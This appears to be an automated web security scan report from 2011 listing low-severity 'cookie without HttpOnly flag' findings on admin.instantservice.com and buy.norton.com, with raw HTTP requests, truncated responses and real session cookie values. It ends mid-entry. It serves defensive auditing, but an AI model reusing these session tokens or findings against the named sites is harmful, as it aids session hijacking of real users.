There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive. You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
10.1. https://admin.instantservice.com/Customer
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://admin.instantservice.com
Path:
/Customer
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=9A45BF0A3BE120A9EF79A1A51006FFFF; Path=/isservices The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Customer HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:36:51 GMT Server: Apache Pragma: no-cache Cache-Control: no-cacheSet-Cookie: JSESSIONID=9A45BF0A3BE120A9EF79A1A51006FFFF; Path=/isservices Location: https://admin.instantservice.com/customerclient_error.html?null Content-Length: 0 P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8
10.2. https://admin.instantservice.com/links/5851/14753
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://admin.instantservice.com
Path:
/links/5851/14753
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=44FE3736608A2C17EACC6E31AB906A9B; Path=/isservices The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/5851/14753 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:49 GMT Server: Apache Pragma: no-cache Cache-Control: no-cacheSet-Cookie: JSESSIONID=44FE3736608A2C17EACC6E31AB906A9B; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 5905 Connection: close Content-Type: text/html;charset=utf-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <title>VRSN Sales U...[SNIP]...
10.3. https://admin.instantservice.com/links/5851/16144
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://admin.instantservice.com
Path:
/links/5851/16144
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=0B3AF203D82136BD07783C04277FEF66; Path=/isservices The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/5851/16144 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:50 GMT Server: Apache Pragma: no-cache Cache-Control: no-cacheSet-Cookie: JSESSIONID=0B3AF203D82136BD07783C04277FEF66; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 5858 Connection: close Content-Type: text/html;charset=utf-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <title>VRSN Sales A...[SNIP]...
10.4. https://admin.instantservice.com/links/5851/16145
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://admin.instantservice.com
Path:
/links/5851/16145
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=13A178978A8AF485E01EA735265A1159; Path=/isservices The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/5851/16145 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:50 GMT Server: Apache Pragma: no-cache Cache-Control: no-cacheSet-Cookie: JSESSIONID=13A178978A8AF485E01EA735265A1159; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 5853 Connection: close Content-Type: text/html;charset=utf-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <title>VRSN Sales A...[SNIP]...
10.5. https://admin.instantservice.com/links/5851/39897
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://admin.instantservice.com
Path:
/links/5851/39897
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=A931592882D97BC2DB5C2B6F4668C8C6; Path=/isservices The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/5851/39897 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:50 GMT Server: Apache Pragma: no-cache Cache-Control: no-cacheSet-Cookie: JSESSIONID=A931592882D97BC2DB5C2B6F4668C8C6; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 5946 Connection: close Content-Type: text/html;charset=utf-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <title>VRSN Sales U...[SNIP]...
10.6. http://buy.norton.com/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:symSessionGuid=0302548D-BA19-1881-F439-29EE8A29C341; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/ sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?wicket:interface=:0:hf_pnl_mf_nprd_HeaderTopPanel_0:countryDropdown:globalStores:0:globalStore::ILinkListener:: HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:25 GMT Location: http://buy.norton.com/redirector/estore?COUNTRY=AR&VENDORID=Symantec_symEpVendor&LANGUAGE=ES&CURRENCY=ARS&PROMOID=Set-Cookie: symSessionGuid=0302548D-BA19-1881-F439-29EE8A29C341; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 455 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/redirector/e...[SNIP]...
10.7. http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:symSessionGuid=A14AC841-BBE7-6D86-6DD9-BA8D20C045DF; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/ sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0,must-revalidate, no-store Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:44 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=A14AC841-BBE7-6D86-6DD9-BA8D20C045DF; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 54738 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
10.8. http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/ sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0,must-revalidate, no-store Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:47 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 52186 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
10.9. http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/ sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0,must-revalidate, no-store Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:49 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 48409 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
10.10. http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:symSessionGuid=6BFEBE10-1BBE-1163-BE37-B80D146480F2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/ sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0,must-revalidate, no-store Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:52 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=6BFEBE10-1BBE-1163-BE37-B80D146480F2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/ Set-Cookie: sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 63835 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
10.11. http://buy.norton.com/estore/mf/landingProductFeatures
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/landingProductFeatures
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/ sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 HTTP/1.1 Host: buy.norton.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mbox=check#true#1315621948|session#1315621887128-280442#1315623748|PC#1315621887128-280442.19#1316831490; s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; COUNTRY=US; LANGUAGE=en; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; LASTTIME_CV_DATE=Sep-09-2011 14:31:16; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st); BIGipServerbuy1_prd_SSL=4046749583.16671.0000
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Date: Fri, 09 Sep 2011 21:31:18 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 55880 Connection: Keep-Alive <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js i...[SNIP]...
10.12. http://buy.norton.com/estore/mf/landingPromotion
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/landingPromotion
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/ sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/landingPromotion HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:32 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 50623 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
10.13. http://buy.norton.com/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/ sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:58 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 68924 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
10.14. http://buy.norton.com/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/ sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:38:02 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 73974 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
10.15. http://buy.norton.com/estore/mf/upgradeCenter
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/upgradeCenter
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/ sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/upgradeCenter HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:30 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 137137 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
10.16. http://buy.norton.com/estore/mf/upgradeRenewal
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/upgradeRenewal
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/ sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199 HTTP/1.1 Host: buy.norton.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; BIGipServerbuy1_prd_SSL=4046749583.16671.0000; symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; AKNORT=0; mbox=check#true#1315621970|session#1315621887128-280442#1315623770|PC#1315621887128-280442.19#1316831510|profile#+_COUNTRY-US+_LANGUAGE-en+_TRAFFIC_SOURCE-trf_id%3Asymcom+_PGM_TYPE-UNKNOWN+_SUBCHANNEL-Online%20%281st%29+_ORIG_SUB-Online%20%281st%29#1380421910; s_eVar63=%5B%5B'store%253Atrf_id%253Asymcom'%2C'1315621909811'%5D%5D; s_eVar65=%5B%5B'store%253Aonline%2520%25281st%2529'%2C'1315621909812'%5D%5D; s_cc=true; s_nr=1315621909816-New; event69=event69; s_eVar70=%5B%5B'23440%253A0%253A0%252C'%2C'1315621909824'%5D%5D; s_sq=%5B%5BB%5D%5D; COUNTRY=US; LANGUAGE=EN; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; LASTTIME_CV_DATE=Sep-09-2011 14:31:20; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st)
Response
